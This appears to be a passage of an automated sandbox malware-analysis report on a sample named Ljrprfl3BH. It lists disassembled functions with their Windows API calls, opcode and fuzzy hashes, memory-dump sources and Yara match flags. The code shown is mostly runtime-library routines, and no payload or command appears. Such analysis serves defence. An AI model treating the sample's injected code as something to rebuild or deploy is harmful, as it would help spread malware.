                                                                            • Instruction ID: 375e79c53d3bcaca8bdb11d34ea16f93cbcffeb35ab56cd023e7f34feda17694
                                                                            • Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                            • Instruction Fuzzy Hash: 2361F271D00205AFEB20DF69C842B9ABBF4EF0D710F14516BE888EB382E7759D418B59
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _free
                                                                            • String ID:
                                                                            • API String ID: 269201875-0
                                                                            • Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                            • Instruction ID: 72a8b008d448e6c83dcadc480a8522578716f4136f24503c61f6ddfdb37d0b40
                                                                            • Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                            • Instruction Fuzzy Hash: 55610239D44219AFDB21DFA8C841BAABBF5EF24720F3041AEE854EB355D7319941CB90
                                                                            APIs
                                                                            • GetConsoleCP.KERNEL32(?,0042C22D,E0830C40,?,?,?,?,?,?,00433FE8,0040DDCB,0042C22D,?,0042C22D,0042C22D,0040DDCB), ref: 004338B5
                                                                            • __fassign.LIBCMT ref: 00433930
                                                                            • __fassign.LIBCMT ref: 0043394B
                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,0042C22D,00000001,?,00000005,00000000,00000000), ref: 00433971
                                                                            • WriteFile.KERNEL32(?,?,00000000,00433FE8,00000000,?,?,?,?,?,?,?,?,?,00433FE8,0040DDCB), ref: 00433990
                                                                            • WriteFile.KERNEL32(?,0040DDCB,00000001,00433FE8,00000000,?,?,?,?,?,?,?,?,?,00433FE8,0040DDCB), ref: 004339C9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                            • String ID:
                                                                            • API String ID: 1324828854-0
                                                                            • Opcode ID: d6e4a050a64bfb7ccc6b009322825ab70381fc19e65649eea91823c2b0319e50
                                                                            • Instruction ID: 0fd517cfdcf2aa173ba8fdea846c20396cfd97c89b6f08fd2475e7b61059f896
                                                                            • Opcode Fuzzy Hash: d6e4a050a64bfb7ccc6b009322825ab70381fc19e65649eea91823c2b0319e50
                                                                            • Instruction Fuzzy Hash: 7751C470E002099FCB20DFA8D845BEEBBF4EF09701F14412BE556E7291E774AA41CB69
                                                                            APIs
                                                                            • GetConsoleCP.KERNEL32(?,021BC494,E0830C40,?,?,?,?,?,?,021C424F,0219E032,021BC494,?,021BC494,021BC494,0219E032), ref: 021C3B1C
                                                                            • __fassign.LIBCMT ref: 021C3B97
                                                                            • __fassign.LIBCMT ref: 021C3BB2
                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,021BC494,00000001,?,00000005,00000000,00000000), ref: 021C3BD8
                                                                            • WriteFile.KERNEL32(?,?,00000000,021C424F,00000000,?,?,?,?,?,?,?,?,?,021C424F,0219E032), ref: 021C3BF7
                                                                            • WriteFile.KERNEL32(?,0219E032,00000001,021C424F,00000000,?,?,?,?,?,?,?,?,?,021C424F,0219E032), ref: 021C3C30
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                            • String ID:
                                                                            • API String ID: 1324828854-0
                                                                            • Opcode ID: e6aa7f8e09cc3bdd419a993f0e627323657b2fb42e9cf7c9360fe368da63a324
                                                                            • Instruction ID: 601ec26402cd89b24d94c4e7c209bc58be5e54d869bfed9301e5c5c003c7b382
                                                                            • Opcode Fuzzy Hash: e6aa7f8e09cc3bdd419a993f0e627323657b2fb42e9cf7c9360fe368da63a324
                                                                            • Instruction Fuzzy Hash: 5451D778940209AFCB11CFA4D885BEEBBF5EF19700F24815EE965E7391D730A541CB64
                                                                            APIs
                                                                            • _ValidateLocalCookies.LIBCMT ref: 004286EB
                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 004286F3
                                                                            • _ValidateLocalCookies.LIBCMT ref: 00428781
                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 004287AC
                                                                            • _ValidateLocalCookies.LIBCMT ref: 00428801
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                            • String ID: csm
                                                                            • API String ID: 1170836740-1018135373
                                                                            • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                            • Instruction ID: 6873744b8b7164bb1b3b36c6b2f168add7434ae9e481f0ca892fbce792e2aca1
                                                                            • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                            • Instruction Fuzzy Hash: 8C411934B012289BCF10DF29DC45A9F7BB0AF80328F64815FE8145B392DB399D15CB99
                                                                            APIs
                                                                            • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 021B4ABD
                                                                              • Part of subcall function 021B4D8C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,021B47F0), ref: 021B4D9C
                                                                            • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 021B4AD2
                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 021B4AE1
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 021B4AEF
                                                                            • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 021B4B65
                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 021B4BA5
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 021B4BB3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                            • String ID:
                                                                            • API String ID: 3151764488-0
                                                                            • Opcode ID: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                                            • Instruction ID: 367788f7fc04811abcf8bff953a155ebc1684737c403c1cabf70d0bcfbff0623
                                                                            • Opcode Fuzzy Hash: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                                            • Instruction Fuzzy Hash: F9310A35A402149FCF16EF68C9A0BED73B9FF44710F248565D91597283DB70E901CB94
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                            • Instruction ID: 6d10875eadbb656c302b38412db81507454656e5ad58498e79d080ea23809695
                                                                            • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                            • Instruction Fuzzy Hash: 54110D72A04215BFDB202FB79C05F6B7A5CEF89725F20163BF815C7241DA38890587A9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                            • Instruction ID: 0acd71d62a18603baddc3271fcc364509f0d33ed0de5a0b4ec3425bf98d891f9
                                                                            • Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                            • Instruction Fuzzy Hash: 8E110A39644118BFDB252F76DC08DAB3F6EEF91731B210629FC15D7140DB318501CAA4
                                                                            APIs
                                                                              • Part of subcall function 0043A0BA: _free.LIBCMT ref: 0043A0E3
                                                                            • _free.LIBCMT ref: 0043A3C1
                                                                              • Part of subcall function 0043345A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                              • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                            • _free.LIBCMT ref: 0043A3CC
                                                                            • _free.LIBCMT ref: 0043A3D7
                                                                            • _free.LIBCMT ref: 0043A42B
                                                                            • _free.LIBCMT ref: 0043A436
                                                                            • _free.LIBCMT ref: 0043A441
                                                                            • _free.LIBCMT ref: 0043A44C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                            • Instruction ID: 1a6205ac72ebf8d1688c9f65f809cb8e6d8ac8f7b7a09961daf7fc6283f763b0
                                                                            • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                            • Instruction Fuzzy Hash: B6119032980704A7E522BFB2CC07FCB7BAD6F18305F40581EB6DA66052CA2CE5184B47
                                                                            APIs
                                                                              • Part of subcall function 021CA321: _free.LIBCMT ref: 021CA34A
                                                                            • _free.LIBCMT ref: 021CA628
                                                                              • Part of subcall function 021C36C1: HeapFree.KERNEL32(00000000,00000000,?,021CA34F,?,00000000,?,00000000,?,021CA5F3,?,00000007,?,?,021CA9E7,?), ref: 021C36D7
                                                                              • Part of subcall function 021C36C1: GetLastError.KERNEL32(?,?,021CA34F,?,00000000,?,00000000,?,021CA5F3,?,00000007,?,?,021CA9E7,?,?), ref: 021C36E9
                                                                            • _free.LIBCMT ref: 021CA633
                                                                            • _free.LIBCMT ref: 021CA63E
                                                                            • _free.LIBCMT ref: 021CA692
                                                                            • _free.LIBCMT ref: 021CA69D
                                                                            • _free.LIBCMT ref: 021CA6A8
                                                                            • _free.LIBCMT ref: 021CA6B3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                            • Instruction ID: c6dddd374d39e56e3816771995ca73bb5e8e2fac817262dcf13f05da22efa3d3
                                                                            • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                            • Instruction Fuzzy Hash: E311B135980B08BEDA21BFB1DD55FCB779EDF10300FA0492CA2A9A6161DB24B5108F80
                                                                            APIs
                                                                            • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 004123F0
                                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 004123F6
                                                                            • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 00412423
                                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 0041242D
                                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B29,?,?,?,00000000), ref: 0041243F
                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412455
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00412463
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                            • String ID:
                                                                            • API String ID: 4227777306-0
                                                                            • Opcode ID: ba26f486df76d842dabe37b99459d44fccdc07bc3ddf0c1636ffc481c0617ea2
                                                                            • Instruction ID: 5cfb26a65153cc27f48dfa9c0f225a7cd51ea371121a2632e0d6d729d80d374e
                                                                            • Opcode Fuzzy Hash: ba26f486df76d842dabe37b99459d44fccdc07bc3ddf0c1636ffc481c0617ea2
                                                                            • Instruction Fuzzy Hash: 3201F738600121A7C720AF66ED09BEF3768AF42B52BA0443BF905D2151DBACD954866D
                                                                            APIs
                                                                            • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,021A0D90,?,?,?,00000000), ref: 021A2657
                                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,021A0D90,?,?,?,00000000), ref: 021A265D
                                                                            • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,021A0D90,?,?,?,00000000), ref: 021A268A
                                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,021A0D90,?,?,?,00000000), ref: 021A2694
                                                                            • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,021A0D90,?,?,?,00000000), ref: 021A26A6
                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021A26BC
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 021A26CA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                            • String ID:
                                                                            • API String ID: 4227777306-0
                                                                            • Opcode ID: 6bc3ccd81d67fd1a20a10fcda5f24da638e68139e84298e1693e69c500751e62
                                                                            • Instruction ID: 190edf384f7373e105bda4713ab291ec1c77309f8c66270f9c173c6c6fc263b3
                                                                            • Opcode Fuzzy Hash: 6bc3ccd81d67fd1a20a10fcda5f24da638e68139e84298e1693e69c500751e62
                                                                            • Instruction Fuzzy Hash: 20018F3D682115ABDB24BF69EC58BAF3778AF42B52B600425FC19D3150DB34D9048AE8
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,021A66FB), ref: 021A24A6
                                                                            • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 021A24B4
                                                                            • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 021A24C2
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,021A66FB), ref: 021A24F0
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 021A24F7
                                                                            • GetLastError.KERNEL32(?,?,?,021A66FB), ref: 021A2512
                                                                            • GetLastError.KERNEL32(?,?,?,021A66FB), ref: 021A251E
                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021A2534
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 021A2542
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                            • String ID: kernel32.dll
                                                                            • API String ID: 4179531150-1793498882
                                                                            • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                            • Instruction ID: d21f41cfd8b82ccf7576d319cbc8303569b3d70675f627913d2d40db2a376694
                                                                            • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                            • Instruction Fuzzy Hash: 6BF0A97A9403103FF6113B797C6995A3FACDD46A233200636F812D2192EB75C9008658
                                                                            APIs
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C66D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Exception@8Throw
                                                                            • String ID: <(@$<(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                            • API String ID: 2005118841-859722693
                                                                            • Opcode ID: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                                            • Instruction ID: a061ea616c9574019159ec0f40f66c927ac9cef8fcde5d3cdfefebe65de0f9c0
                                                                            • Opcode Fuzzy Hash: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                                            • Instruction Fuzzy Hash: 9FF0FCB2900204AAC714DB54CC42FAB33985B11744F14857BEE11B61C3DA7DAD05C79C
                                                                            APIs
                                                                            • _free.LIBCMT ref: 00431738
                                                                              • Part of subcall function 0043345A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                              • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                            • _free.LIBCMT ref: 0043174A
                                                                            • _free.LIBCMT ref: 0043175D
                                                                            • _free.LIBCMT ref: 0043176E
                                                                            • _free.LIBCMT ref: 0043177F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID: u
                                                                            • API String ID: 776569668-1911582562
                                                                            • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                            • Instruction ID: 641b2a1348aedb00c037ff60dfb94c9ddf1ba1fe668fd8dfad71f65212485368
                                                                            • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                            • Instruction Fuzzy Hash: D8F03070C003109BAA236F15AC414053B60BF2D727B15626BF40697273CB38D952DF8E
                                                                            APIs
                                                                            • _free.LIBCMT ref: 021C199F
                                                                              • Part of subcall function 021C36C1: HeapFree.KERNEL32(00000000,00000000,?,021CA34F,?,00000000,?,00000000,?,021CA5F3,?,00000007,?,?,021CA9E7,?), ref: 021C36D7
                                                                              • Part of subcall function 021C36C1: GetLastError.KERNEL32(?,?,021CA34F,?,00000000,?,00000000,?,021CA5F3,?,00000007,?,?,021CA9E7,?,?), ref: 021C36E9
                                                                            • _free.LIBCMT ref: 021C19B1
                                                                            • _free.LIBCMT ref: 021C19C4
                                                                            • _free.LIBCMT ref: 021C19D5
                                                                            • _free.LIBCMT ref: 021C19E6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID: u
                                                                            • API String ID: 776569668-1911582562
                                                                            • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                            • Instruction ID: c743eddafb9d62ff966f244f310dc0fa8b8a72eae4ac0eab62178765146fa849
                                                                            • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                            • Instruction Fuzzy Hash: E0F0BD75C40320AF9F21BF14BC814047B61AF2972272152AAF41697372C735D966DFDE
                                                                            APIs
                                                                              • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                              • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                              • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                            • _memcmp.LIBVCRUNTIME ref: 0043115C
                                                                            • _free.LIBCMT ref: 004311CD
                                                                            • _free.LIBCMT ref: 004311E6
                                                                            • _free.LIBCMT ref: 00431218
                                                                            • _free.LIBCMT ref: 00431221
                                                                            • _free.LIBCMT ref: 0043122D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorLast$_memcmp
                                                                            • String ID:
                                                                            • API String ID: 4275183328-0
                                                                            • Opcode ID: 1403a73044b2a32c4151c19e3ee42d3d20986d24228a641b3762fb9bf04db679
                                                                            • Instruction ID: e2129b0906de41222375811faf8a10f30bb0ce812e5bc895f935e357d1a7b262
                                                                            • Opcode Fuzzy Hash: 1403a73044b2a32c4151c19e3ee42d3d20986d24228a641b3762fb9bf04db679
                                                                            • Instruction Fuzzy Hash: BBB12975A012199FDB24DF18C894AAEB7B4FB18304F1086EEE949A7360D775AE90CF44
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,021C25DC,00000001,00000001,?), ref: 021C23E5
                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,021C25DC,00000001,00000001,?,?,?,?), ref: 021C246B
                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 021C2565
                                                                            • __freea.LIBCMT ref: 021C2572
                                                                              • Part of subcall function 021C38FE: RtlAllocateHeap.NTDLL(00000000,0219DACD,00000000), ref: 021C3930
                                                                            • __freea.LIBCMT ref: 021C257B
                                                                            • __freea.LIBCMT ref: 021C25A0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1414292761-0
                                                                            • Opcode ID: 011fbe7e6b9632404c7d9c1a6e466163715f947e1f03c273384449d8668b7b41
                                                                            • Instruction ID: abd6a8c6422b59d55eb79dc12fa01317b2629c055508b97691ddfa4f361a326a
                                                                            • Opcode Fuzzy Hash: 011fbe7e6b9632404c7d9c1a6e466163715f947e1f03c273384449d8668b7b41
                                                                            • Instruction Fuzzy Hash: 7051C17AA90216AFDB258F64CC64EFF77AAEB54B54F25462CFC04D6150EB34DC40CAA0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __cftoe
                                                                            • String ID:
                                                                            • API String ID: 4189289331-0
                                                                            • Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                            • Instruction ID: bcba8a47191ef526ca7e418728927d43feaec757ba77602666f363a69098e589
                                                                            • Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                            • Instruction Fuzzy Hash: 4F512D36980205AFDF269F68DC40FEE77B9AF4D334FA04259F815D6191EB31D501CAA4
                                                                            APIs
                                                                            • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 021B3041
                                                                              • Part of subcall function 021A8AA2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 021A8AAD
                                                                            • SafeSQueue.LIBCONCRT ref: 021B305A
                                                                            • Concurrency::location::_Assign.LIBCMT ref: 021B311A
                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 021B313B
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 021B3149
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                                            • String ID:
                                                                            • API String ID: 3496964030-0
                                                                            • Opcode ID: 17bd562b5d5d9d9cfdfa562d227ccadc57b46c4ced5fec5b9a2592468eba907b
                                                                            • Instruction ID: 8acf9d18a674a63df71073f084eb76446da0f78b6a9c1941017fd0365f59fdfa
                                                                            • Opcode Fuzzy Hash: 17bd562b5d5d9d9cfdfa562d227ccadc57b46c4ced5fec5b9a2592468eba907b
                                                                            • Instruction Fuzzy Hash: F4310331A406119FCB2AEF68C894BAAB7F5FF44710F1145A9DC2A8B291DB30E815CFC0
                                                                            APIs
                                                                            • FindSITargetTypeInstance.LIBVCRUNTIME ref: 021B8F67
                                                                            • FindMITargetTypeInstance.LIBVCRUNTIME ref: 021B8F80
                                                                            • FindVITargetTypeInstance.LIBVCRUNTIME ref: 021B8F87
                                                                            • PMDtoOffset.LIBCMT ref: 021B8FA6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FindInstanceTargetType$Offset
                                                                            • String ID:
                                                                            • API String ID: 1467055271-0
                                                                            • Opcode ID: be68cb40e55dd2292cbbce737d8ca9aab969a3a65d4eb3b761b4647cdf86019d
                                                                            • Instruction ID: a25eb2409ace9ac69e2dc456bcd3fb5bfa858c574c9530c7c3917064eb4717ec
                                                                            • Opcode Fuzzy Hash: be68cb40e55dd2292cbbce737d8ca9aab969a3a65d4eb3b761b4647cdf86019d
